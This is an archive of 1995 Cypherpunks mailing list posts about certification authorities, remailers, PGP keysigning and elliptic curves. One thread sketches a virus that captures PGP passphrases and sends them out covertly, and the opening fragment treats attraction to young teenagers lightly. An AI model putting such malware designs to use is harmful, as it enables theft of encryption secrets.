   I'm soory but I don't care if the images come from mars . Jerking off 
to the images of kids is sick.
----------------------------
	That's your opinion, and thus your problem to be dealt with by you.
Yes, I'm calling that a _problem_. If it makes you want to harm others who
aren't harming anyone else, then it's a problem.
	I also have my doubts as to whether you can honestly deny ever being
attracted by a young teenager, even as an adult. But your sexual preferences
are not my business, any more than anyone else's are of yours.
	I will refrain from posting further on cypherpunks about this, since
it's getting far from the purpose of the list. Feel free to reply in private
email.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 26 Nov 1995 17:51:31 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Certification Authority
Message-ID: <199511260942.BAA09733@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 25 Nov 1995, Aleph One wrote:

> On Sat, 25 Nov 1995, Perry E. Metzger wrote:
> 
> > Hmmm. If someone is willing to find out what is needed to become a
> > C.A. and to run one, and it turns out not to be particularly onerous,
> > I or one of my corporate alter egos might be willing. I must say,
> > though, that being an anti-fan of X.509 the situation would be ironic...
> > 
> > Perry
> 
> Well from Netscape perspetive as far as I know you need nothing. Basicly
> when the browser finds a new CA that it does know about it promts
> the user and through a series of dialog boxes the user chooses to trust
> it or not.

Gee, wasn't that clever of Netscape??

Lilies that fester smell worse than weeds ... people should remember that.
(I think Shakespeare first wrote that in one of his sonnets ...)

> (Well that is theory, and what netscape release notes say, since
> I dont have access to an SSL server right now, and would need to figure
> out how to make my own certificate, I havent tried it).

Bingo.  *theory* ... right ... I mean what would be the point??

Installing Netscape degrades your inherent system security.  No ifs, 
ands, or buts.

Netscape Navigator basically destroys whatever sense of privacy or
security, any person ever had the illusion of having.  And that pretty 
well rules out CA.



Alice de 'nonymous ...

                                  ...just another one of those...
                                                   ...hunters...

P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Kenney <saken@chardos.connix.com>
Date: Sun, 26 Nov 1995 14:56:59 +0800
To: remailer-operators@c2.org
Subject: REPOST: Amnesia Remailer
Message-ID: <199511260646.BAA06047@chardos.connix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Excuse the repost but I was asked to do this again !MIME :)

The amnesia remailer is now available for public use:

amnesia is a combination mixmaster/type 1 remailer supporting
the following capabilities:


<amnesia.chardos.connix.com> cpunk mix pgp hash latent cut ek ksub

Encrypted: PGP  - header
##		- pasting
Latency:	- header
Cutmarks:	- header
Encrypt-Key:	- header

Due to the nature of my mail connection there is an automatic variable
latency of 0-180 minutes. The reordering pool is set to 5 presently.

amnesia is currently running the following software:

Lance Cottrell's Mixmaster v.2.0.3beta6
Lance Cottrell's Reordering package.
John Fleming's  Freedom Remailer v.1.00 (upgrading to 1.6beta soon)

Hopefully USENET posting capability will be added soon.

The remailer keys are attached.

Scott Kenney


=-=-=-=-=-=-=-=-=-=-=-=
amnesia amnesia@chardos.connix.com e320fd79c4c229decabe4d486bd84394 2.0.2

- -----Begin Mix Key-----
e320fd79c4c229decabe4d486bd84394
258
AASlry72N9LH8PxZ2oyfETBsL/BTgi9XAVnRJ/61
poZOwA+JJ7hmok+3PCjRJyyT+e8zbzxKIcYoJneP
8alFIy/YHhFbzBHwqfRnakULVGdAKhonR4M2lqNc
VWO+uiFdCxafVe0ZONjFQIrcr1EUS5bIQEBpf+fz
3wVkzzQ+ifOITwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----


- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzB86y8AAAEEAKEWFiS8DqxtyTacR9DOIcRqpRTkxdlq6UY4FxBzy16C0N3S
dspQkwAQR5dDQqZ2JSRJ6m+iE0l+3OohZn44xMj/cbKUDFQon3Vh6vCBVvABPc1N
aY1X9x9H7FzPOWsc4pivVbzJB3luw6+gzZ2zYAN/nX0oi9LoCrM8PpA8rdoFAAUR
tDhBbW5lc2lhIFJlbWFpbGVyIFR5cGUgSSBLZXkgPGFtbmVzaWFAY2hhcmRvcy5j
b25uaXguY29tPokAlQMFEDCB9D2zPD6QPK3aBQEB+6sEAIL/OtuErDiVpOqRARQQ
I0yWWTU1tyT11Bl+Kmx1Sf5p1JyE2Z6bt3tPLflDyek2NY42tNV0k8cbig4Q9kvP
5GwCUcKRexiWVJFUpF6FABL2wZZMltt7nMmtxRwxw+LsMra7dYhPSaYewNNHKQ7C
xcYKPxTg5HkCg7leqtEp2H9p
=6+JZ
- -----END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLgNDZQgY7wl3Gh1AQGUVQQA05aN+xx4sVVohysVN8xrvsvc5KxP/82y
sLUHCerLEsKH2EHnb1mcoT8Ayu+nrp+0YU+/di2QNF+AMMONhP/J0OQJt7odqbFM
ZgxUmyX9ya1UnRmZDiTEubGsUWeOMt9IZoeLryzMgYcB9502GpvMZWp8r6YFW5vN
nEphpRRncWY=
=Abso
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 26 Nov 1995 18:00:44 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Certification Authority
Message-ID: <199511260953.BAA10105@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 25 Nov 1995, Adam Shostack wrote:

> 	Does X.509 version 3 fix the problem that Ross Anderson points
> out in his 'Robustness Principles' paper? (Crypto '95 proceedings, or
> ftp.cl.cam.ac.uk/users/rja14/robustness.ps.Z)
> 
> 	Its an excellent paper, well worth reading, but the basic
> problem is that X.509 encrypts before signing.

You'd rather sign before encryption??

Doesn't that give you "known plain-text" to attack?  i.e. the signature.

I'm not sure whether it would or wouldn't, but I'm sure some
cryptographers here might clear that up mighty quick -- before any more
harm is allowed, I mean. 

> Adam
> 
> -- 
> "It is seldom that liberty of any kind is lost all at once."
> 					               -Hume


Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@miamisci.org (Joe Block)
Date: Sun, 26 Nov 1995 15:21:39 +0800
To: cypherpunks@toad.com
Subject: Re: So. FL Cypherpunks Keysigning/Party
Message-ID: <v01520c09acddba0b349f@[199.227.2.170]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Jim Ray (liberty@gate.net) announced a South Florida Cypherpunks meeting
for the night of Wednesday, November 29th at the Abbey Brewing Company on
South beach.

>Location:
>The Abbey Brewing Company  (305) 538-8110
>1115 16th Street, Miami Beach
>
>Directions:
>[From North: Take I-95 South to 195 exit, over to the beach, and go South
>on Alton Road. Look for a green sign that says "BAR" atop the building.]
>[From South: Take I-95 North to 395 exit, over to the beach, and go North
>on Alton Road. Look for a green sign that says "BAR" atop the building.]

I am proposing that all cypherpunks planning on attending the meeting email
me their PGP key fingerprint between now and noon on the 29th.  I'll
collate them and print enough copies of the fingerprint checklist for all
who've announced that they're planning to attend.  At the meeting, you can
verify (or not, not my business, really) the fingerprints with the other
attendees.  Afterwards, we'll exchange keys via email and sign them at home
and mail them back to their owners.  I'll set up an email list so that each
person can email out their key once they've merged all the signatures.

Suggestions as to how to streamline this process are welcome.

For more information on the meeting, contact Jim at liberty@gate.net

Joe Block <jpb@miamisci.org>

"We can't be so fixated on our desire
 to preserve the rights of ordinary Americans ..."
 -- Bill Clinton  (USA TODAY, 11 March 1993, page 2A)
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMLgL5WGnwFiC3O2NAQHxwAgAu6kSVBfEwBYGwNaYbw5OOjNxP6j49T5F
h2z7WIKhehq94yiT+WhyijMscCqlGUTsBp3aDVFYY9n2/ONXr+MyGIMoTst0dvsv
dXhuguIcBTuvImTddGA4MNZG7eUibO/r98BPJlF9iRfHTwpCOXOsNJGit+ONSB++
Cy8xgAFUiAUaOvNbi63pTnELoyCmBvFqhROqspeUmRGYYHZj4w3DF3nEH+XED31K
vVx7FFpejIeBBfhk72T7vL0L+cu17R4uIhOgmqUmHIw7k7rmLxf+z7f7fNAwQpPi
yjEsyXPtKwENXV2kRSc12O8XjwNoKiQBfuGBDpSfqbev4fkwoMuoyA==
=z9sP
-----END PGP SIGNATURE-----

signoff
2048bit-Fingerprint: 74 64 C7 6F 51 72 36 3D 87 75 F9 F5 2A F6 8F 74
------------------------------------------------------------------------
Help Phil! email zldf@clark.net or see http://www.netresponse.com/zldf






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 26 Nov 1995 23:19:21 +0800
To: cypherpunks@toad.com
Subject: BOS_nya
Message-ID: <199511261508.KAA17650@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-26-95. Washrag:

   "Seeking the Government That Governs Best." Book review.

      What Comes Next:
      The End of Big Government And the New Paradigm Ahead
      By James P. Pinkerton
      Hyperion. 404 pp. $24.95

      In Pinkerton's account, bureaucracy survives today only
      because no one has yet developed a coherent replacement
      model." Instead we have deluded ourselves into thinking
      that periodic upgrading of what Pinkerton calls the
      "Bureaucratic Operating System" (BOS) -- in the same way
      that computer software is upgraded -- will enable us to
      avoid the gloomy prospect of life in the "Cyber Future,"
      his term for the horrific predicament of extreme
      inequality and hypercrime to which we are headed.

      At one point Pinkerton suggests that a parallel for Bill
      Clinton may be found in Mikhail Gorbachev. Both leaders
      "shrank from genuine perestroika" after their peoples
      had come to the realization that the system itself was
      the problem.

      Displaying a sure grasp of popular culture, technology
      and political history, Pinkerton writes engagingly and
      insightfully about the defects and malfunctionings of
      the American bureaucratic state. His refreshing analyses
      of the flaws in bureaucratic thinking are among the best
      that we have on the subject and, surely, the wittiest.

   BOS_nya  (7 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Hupp" <jhupp@novellnet.gensys.com>
Date: Mon, 27 Nov 1995 00:54:14 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Certification Authority
Message-ID: <20439E87AE1@Novellnet.Gensys.com>
MIME-Version: 1.0
Content-Type: text/plain


On 25 Nov 95 at 15:35, Alex Strasheim wrote:

: > Basicly when the browser finds a new CA that it does know about it promts
: > the user and through a series of dialog boxes the user chooses to trust it
: > or not. 
: 
: Is anyone running an ssl web server that would let us see how this works?
: 
: 
	A 'how to' on rolling your own can be found at:
		http://fiasco.snre.umich.edu/~altitude/ssl/ssl.saga.html

	While that one is using a certificate from VaraSign, as mentioned 
earlier you can create your own authority and certificate  with tools you find at:
		http://bond.edu.au/External/Misc/Crypto/

-- 
JHupp@gensys.com           |For PGP Public Key:
http://gensys.com          |finger jhupp@gensys.com
The difference between science and the fuzzy subjects is that science
requires reasoning, while those other subjects merely require scholarship





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas E Zerucha <zerucha@shell.portal.com>
Date: Mon, 27 Nov 1995 03:54:03 +0800
To: Norman Hardy <norm@netcom.com>
Subject: Re: Virus attacks on PGP
In-Reply-To: <acdc55c10202100472f8@DialupEudora>
Message-ID: <Pine.SUN.3.90.951126111730.22642A-100000@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 24 Nov 1995, Norman Hardy wrote:

> At 2:46 PM 11/24/95, Thomas E Zerucha wrote:
> ....
> 
> >It takes quite an effort to create a complex virus to do this.  It
> >reminds me of the Glomar Challenger that was used to recover the remains
> >of a russian sub (my memory is somewhat faulty).  Such a virus would
> >require a great investment in time and money.  What target would be worth it?
> >Many otherwise feasible things aren't economically pracitcal.
> 
> Yes, but if your particular habits became widespread, an intelligence
> agency could amortize the virus effort across many victims.
> 
> Here is just one such complicated virus:
> Sit in the OS watching for PGP to be launched. Patch PGP on the way in. The
> patch writes to disk the location and password for the secure key ring.
> Concurrently the virus watches for there to be IP service and sends the
> disk information as a UDP.

The virus is starting to get large and noticeable.  First, I alternate 
between a.out and ELF (and DOS .EXE). It doesn't have to patch pgp, just 
look for it to be loaded and teh secring file accessed.  Then record 
keystrokes.  This would also work with a hardware implementation if the 
secring passphrase is external (as opposed to an external keypad).

This is what can be done when PGP is used for communication.  For other 
info, I can isolate a computer (no modem, unroutable IP addresses, etc).

Of course our firewall is a socks server and doesn't forward UDP.  Maybe 
a socksified, SSL virus?  My computer is attatched that way far more than 
via modem.  And maybe I should just nuke (or modularize) UDP?  You can do 
interesting things with kernel source.

> Alternatively the virus waits for idle time, (screen saver time) and dials
> an 800 number having turned off the modem speaker. But don't send the same
> data twice!

That woudl be interesting - even with the speaker "off" the power surge 
causes clicking and other signs.  Not to mention that the interrupt count 
would start moving (of course the virus could replace the entire OS and 
would only have to find 300K chunks to hide in).

Were they that interested, they could place a surveillence device over my 
desk (I don't know if they can pick up the scan on LCDs like they can on 
monitors - I am suprised they didn't put the kybosh to the FCC emission 
rules).  Maybe I can move my desk, or my pgp station inside our EMI 
testing faraday cage :).

zerucha@shell.portal.com -or- 2015509 on MCI Mail
  finger zerucha@jobe.portal.com for PGP key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <khijol!erc@uunet.uu.net>
Date: Mon, 27 Nov 1995 02:09:00 +0800
To: anonymous-remailer@shell.portal.com
Subject: Re: Cypherpunk Certification Authority
In-Reply-To: <199511260942.BAA09733@jobe.shell.portal.com>
Message-ID: <199511261854.MAA08675@khijol>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> > (Well that is theory, and what netscape release notes say, since
> > I dont have access to an SSL server right now, and would need to figure
> > out how to make my own certificate, I havent tried it).
> 
> Bingo.  *theory* ... right ... I mean what would be the point??
> 
> Installing Netscape degrades your inherent system security.  No ifs, 
> ands, or buts.
> 
> Netscape Navigator basically destroys whatever sense of privacy or
> security, any person ever had the illusion of having.  And that pretty 
> well rules out CA.
> 
> Alice de 'nonymous ...
> 
>                                   ...just another one of those...
>                                                    ...hunters...
> 
> P.S.  This post is in the public domain.
>                   C.  S.  U.  M.  O.  C.  L.  U.  N.  E.

Is this another one of those LD tentacles? ;)
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935	voicemail/pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLi30yS9AwzY9LDxAQFZTwP/fyisNS+8UlleOpy4+mo8lxD6i7bq3sdP
I80XfihTenRayNPj+eVHBfciSrfSXWbSaScGi5MVUILfShDd71E0mxCimvfXpey6
hHQc2gyMCAuHN5ZswXBKrOry23dzIgNrwfLlnbMoGoUQro2Z/Cg/b9YOy4qaGMer
Gido6n71Npc=
=MN40
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 27 Nov 1995 05:17:52 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Certification Authority
Message-ID: <199511262109.NAA29631@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 26 Nov 1995, Robert Hettinga wrote:

> >Is this another one of those LD tentacles? ;)
> 
> Must that or a spoof of somekind... "She" didn't sign it, and "she" claims
> to have issued a signature...

I have never signed any of my posts to this mailing list and frankly have
no intention of beginning at this point.  No matter what some spoofer
posts, as my "key".  Whoever the dolt was who posted the "pgp key"
hopefully will begin to use it and produce something worthy of their
"signing". 

I always thought that my words spoke for themselves.

I really don't have the inclination to travel to a secured facility and 
to use a secured machine in order to reply to a message on this list, and 
I truly am not interested in issuing a new key on a daily basis.

That is reserved for something of some importance.

Frankly, this is really not worth it.  As some people might have noticed, 
I've simply closed off this communications channel.  There really is 
nothing left to say at this point.  

Or as some people might learn, "Lilies that fester, smell far worse than
weeds."  I think that was a line from a sonnet or soemthing ... not that 
it would refer to anything in particular, or anything. <g>

> Cheers,
> Bob Hettinga


Alice de 'nonymous ...

                                  ...just another one of those...
                                                   ...hunters...

P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Albert Nanomius <nanomius@netcom.com>
Date: Mon, 27 Nov 1995 05:43:44 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199511262132.NAA05593@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



------- Forwarded Message

From: "LadyNada" <ladynada@ix.netcom.com>
To: snet-l@world.std.com
Date: Sun, 26 Nov 1995 13:26:39 +0000
Subject: Post Office to approve some internet email


- -- Area : AEN NEWS -----------------------------------------( M-BOARD.SU1 )----
  Msg#  22280                                       Date: 11-18-95  19:01      
  From: jared@alaska.net                            Read: No     Replied: No   
    To: All                                         Mark:                      
  Subj: Oh, great.  The Post Office is going to certify Internet mail.         
- -------------------------------------------------------------------------------
From: "Jared Armstrong" <jared@alaska.net>
Originally to: news@aen.org
Original Date: Sat, 18 Nov 95 18:47 EST

http://techweb.cmp.com/techweb/ia/18issue/18post.html

 > [Image]

 > Post Office offers Internet digital ID

 > Certification authority a key enabler of electronic commerce

 > By Gail Bronson

 > Side bar WASHINGTON - Come next summer, the U.S. Postal Service
 > expects to be up and running with a service that will identify
 > senders and receivers of Internet messages, a critical enabler of
 > electronic commerce.

 > Specifically, the Postal Service will operate a certification
 > authority for public-key certificates used to digitally sign
 > messages transmitted over the Internet.

 > The Postal Service expects the service to be of particular interest
 > to anyone involved in electronic commerce or electronic data
 > interchange, in which the ability to assure the identity of both
 > the sender and receiver of information can be crucial.

 > "Right now there is no way to figure out if messages on the
 > Internet have been tampered with nor is there any way to
 > authenticate the genuine identity of a sender," said Paul Raines,
 > program manager for electronic commerce at the Postal Service. "It
 > could be a dog on the other end of the Internet now for all you
 > know."

 > Limited beta tests of the Postal Service's system already are under
 > way within the federal government, at the Federal Aviation
 > Administration, Social Security and the Internal Revenue Service.

 > "We're eager to work with VeriSign [RSA Data Security Inc.
 > spin-off] and any other certification authorities to come up with
 > ways to help with cross certification," Raines said. "We're not in
 > this to compete with private companies, rather, we're trying to
 > enable [the electronic commerce] industry."

 > Some users may find the Postal Service certification authority
 > service more appealing than private alternatives because its
 > service will carry the weight of law - tampering with Internet
 > messages would be as much a crime as tampering with regular U.S.
 > mail. On the other hand, there is always the lingering concern of
 > having to deal with a federal bureaucracy.

 > The Postal Service intends to play two roles in the certification
 > business.

 > First, as a certifying service the federal agency will provide the
 > code, or public-key certificate, necessary for recipients of
 > digitally signed messages to identify the sender. This service will
 > be necessary to decrypt mail unless the two correspondents
 > previously exchanged their keys privately. Second, the Postal
 > Service will maintain a server to manage a public register of
 > public-key certificates accessible off the Internet, Raines said.

 > The Postal Service will conduct market studies to gauge demand
 > before deciding how much individuals must pay to obtain someone
 > else's public key certificate. In addition, the Postal Service will
 > sell for less than a dollar an electronic date-time stamp to prove
 > the existence of a message in a particular point in time.

 > "We're taking the same attributes of hard copy that make them
 > legally binding and transferring them to electronic
 > correspondence," Raines said.

 > The Postal Service is working with several companies, including
 > Premenos Corp., to develop the necessary software, Raines said. The
 > user agent and interface specifications for designing software to
 > interface with the Postal Service's server, however, are available
 > free to any one willing to sign a licensing agreement, Raines said.

 > Regardless of how such arrangements work themselves out, the Postal
 > Service intends to operate this business on a nonprofit,
 > self-supported basis. "We don't intend to have first-class mail
 > supporting Internet mail," Raines said.

 > Back to Current Issue

______________________________________________________
                 Jared Armstrong
              Anchorage, Alaska, USA
             Last Free Place On Earth

  jared@alaska.net    http://www.alaska.net/~jared
 For PGP  Key, Send E-Mail With Subject:Get PGP Key
______________________________________________________
                  PGP Key ID E2B22AD1
                    PGP Fingerprint
  38 C7 58 C0 C3 10 E0 9D 51 B2 F4 FA 76 04 47 87
______________________________________________________
______________________________________________________




- --- Reply to: news@aen.org
 * Origin: AEN NEWS Internet Gateway (1:231/110.1)


------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 27 Nov 1995 05:43:14 +0800
To: cypherpunks@toad.com
Subject: Re: Junk E-Mail - Part 4
Message-ID: <199511262133.NAA01459@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 23 Nov 1995, James M. Cobb wrote:

>    BRUSSELS/LONDON - SELLING - A ban on telephone "cold 
>    calling" throughout the European Union was on Tuesday 
>    approved by Euro-MPs, to the consternation of direct mar- 
>    keting and distance selling organisations.  In a move de- 
>    signed to spare people from what MEPs consider to be ir- 
>    ritating telephone calls, a key parliamentary committee 
>    voted to make prior consent from consumers obligatory 
>    before a seller can approach them by telephone. 
>  
>    The proposed ban also applies to communications by e- 
>    mail, raising fears among publishing organisations that 
>    the development of the information society in Europe could 
>    be damaged. 

I think that there are significantly different standards and expectations 
outside the borders of the United States, than inside.  Can you imagine 
the unmitigated "gall" of Euro-MPs in protecting the public rather than 
caving in to direct marketing special interest groups??

Goodness ... how archaic.

The next thing those Europeans are going to do is something really strange
and un-American, like having television commercials broadcast in between
TV programs -- broadcast only after a show is over.  Finished.

Those Europeans just might not allow commercials to be woven in between 
scenes of a 20-minute sitcom.  They might say, before and after ... and
that's it.

I mean this idea that advertising is "pollution" might start to catch on 
in certain European quarters.

> Ban fear, for we have nothing to fear but fear itself. 

Heavens, no.  Than again, I'm waiting for the day that the NY Times 
allows advertising on its op-ed page.

Or for that matter the Washington Post in its online edition.




Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 27 Nov 1995 05:59:00 +0800
To: cypherpunks@toad.com
Subject: Re: key for Alice as promised (not)
Message-ID: <199511262145.NAA02219@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 22 Nov 1995 anonymous-remailer@shell.portal.com wrote:

> > As an incentive for Alice to generate herself a PGP key, I hereby
> > place Alice on notice that if she doesn't sign her next post, and
> > provide a PGP key, I will create one for her, and steal all the
> > postive (?) reputation that she has developed so far.

Positive reputation??  Me??  Uhhm, thanks, I guess.

> > You have 24 hours Alice, otherwise a key gets posted to here, and to
> > the keyservers with your nym on it.
> 
> Well 24 hours have passed, and Alice remains unrepentant:

Can you imagine??  I'm simply not willing to fool myself into thinking 
that I ahve security by posting a key and using PGP.

I think that's irresponsible.

Unless, I have a secure machine dedicated to PGP *which I don't* I don't 
fool myself into thinking that I have any security, at all.

> On Tue, 21 Nov 1995, the old Alice de 'nonymous wrote:
> 
> > Alice here ...
> > 
> > No, *I* am the real Alice, and I refuse to use PGP signing.

Yep ... that's right.

> So here we go Alice's key:
> 
> Type bits/keyID    Date       User ID
> pub  1024/23292ED1 1995/11/22 Alice de 'nonymous <cypherpunks@toad.com>
>           Key fingerprint =  CA 76 81 41 54 CE E7 D6  62 EE 6D 65 EE FB A3 55

Gee, it might even help if you got the address right.  Since when is the 
list address, my address??

cypherpunks@toad.com??




Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <doug@Eng.Auburn.EDU>
Date: Mon, 27 Nov 1995 04:26:59 +0800
To: "Mark M." <markm@omni.voicenet.com>
Subject: Re: Virus attacks on PGP
In-Reply-To: <Pine.LNX.3.91.951124222957.107A-100000@localhost>
Message-ID: <Pine.SUN.3.91.951126141155.15854B-100000@nexus.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 24 Nov 1995, Mark M. wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> On Fri, 24 Nov 1995, Moroni wrote:
> 
> > 
> >     Where can one get PGP burnt into cdrom? Or the equiptment to do it
> >              Thanks in advance
> >                  moroni
> > 
> > 
> > 
> 
> I remember seeing in computer catalog a device that can burn data into a
> cdrom and it even supplies blank cd's.  Unfortunately, I cannot remember
> the name of the catalog.  It might have been _Tiger Software_ or some
> similar catalog.  I do know that the technology is available.
> 
> 
There was a recent review in network computing of about 60 or so
different CDROM recording devices. The cheapest one was about $500 from
Liberty. The most expensive was I think the one from Kodak, for about $20k.
The capabilities of each are different. Some include buffering, some don't.
However, the pre-mastering software used to make file systems on a CDROM
(HSFS, UFS, DOS, ISO-???? (forget that four digit number) is sold separately,
but generally not too expensive. There are also single and multi-session
CD 'burners'. The single session mean you have to do the entire disk in
one session, and generally if you mess up, you need a new disk. The multi-
session devices let you start a session, and pick it up with more information
at a later time.

Most of them are designed for multi-media or audio recording, but you can
generally get pre-mastering software that will work with something like
CD-XA.. etc..
 Check your software for compatibility before purchasing the hardware.

____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
		Pro is to Con as progress is to congress





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Mon, 27 Nov 1995 07:24:46 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Elliptic curves, current status?
Message-ID: <acde968205021004b44c@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 12:07 PM 11/25/95, James A. Donald wrote:

....
>Can someone tell me the true story?

Not with any assurance. I don't trust my own knowledge yet.
I think that the opinion is that the discrete log problem is harder
with elliptic curves than for prime modulus arithmetic for numbers
of a given size. That is why you can use fewer bits.
The inner loop in some elliptic curve systems is not multiply-add
(as is the case with number fields)
but other operations that are as efficient with gates but less
efficient with normal machine instructions.

There are probably an order of magnitude more people that
have studied and published about the problems of breaking
prime modulus crypto than elliptic curves. Perhaps progress
will be faster should elliptic curves be studied by more people.
There are a lot of tricks to speed up discrete logs in for prime
modulus schemes that don't seem to work for elliptic curves.

There are many parameters to an elliptic curve crypto system.
I haven't seen any taxonomy of which kinds are good and which
have been shown to be week. In contrast there seems to be a
consensus about how to pick primes for RSA or Diffie-Hellman.

I am certainly no expert. Perhaps this will prompt comments
from someone who can point to real information.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Zerucha <root@deimos.toad.com>
Date: Mon, 27 Nov 1995 04:30:59 +0800
To: cypherpunks@toad.com
Subject: Re: Cyberpunk handbook
In-Reply-To: <199511210436.UAA26114@jobe.shell.portal.com>
Message-ID: <Pine.LNX.3.91.951126151636.218C-100000@deimos>
MIME-Version: 1.0
Content-Type: text/plain


The worst part of the book was the cover.  I didn't think I was a 
cyberpunk until I could check off 8 out of 10 items (I don't have a pager 
or fake security ID, but I do have a carbide scribe and library with 
similar books in similar stacks:).  To say nothing about fashion.  I am 
no longer in denial ;).

zerucha@shell.portal.com -or- 2015509 on MCI Mail
finger zerucha@jobe.portal.com for PGP key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 27 Nov 1995 04:44:34 +0800
To: cypherpunks@toad.com
Subject: Re: BOS_nya
Message-ID: <v02120d01acde7b8ed2d5@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>      What Comes Next:
>      The End of Big Government And the New Paradigm Ahead
>      By James P. Pinkerton
>      Hyperion. 404 pp. $24.95

I read a review of this book in the Standard <ducking rotten tomatoes> with
in the last week or so.

If you think *I'm* hyperjargonate, you should see how this guy does it.
Hear tell he practically invents his own language...

May be worth a read if the local library has it, though.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 27 Nov 1995 04:47:10 +0800
To: cypherpunks@toad.com
Subject: Electronic Commerce CFP for Special Issue in _The Information Society_
Message-ID: <v02120d03acde7d0d2caa@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

<many sniped mail headers later...>

Dear Colleague:

You may be interested in submitting a manuscript for review for the
following special issue on Electronic Commerce.

Rolf Wigand

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

                        CALL FOR PAPERS

          For a Special Issue on 'Electronic Commerce'

       The Information Society (An International Journal)
       --------------------------------------------------

_The Information Society (TIS)_ journal is inviting authors to submit
papers for review on the topic of 'Electronic Commmerce' for a special
issue to be edited by Rolf Wigand, Syracuse University. The paper
submission deadline is January 15, 1996.

Electronic transactions are now common place in the business and
government environment in the industrialized world.  In the United States
alone, over 50 % of all companies are exchanging data electronically while
engaging in accounting, controlling, production management, funds
transfer, record-keeping, purchasing and selling activities.  Consumers
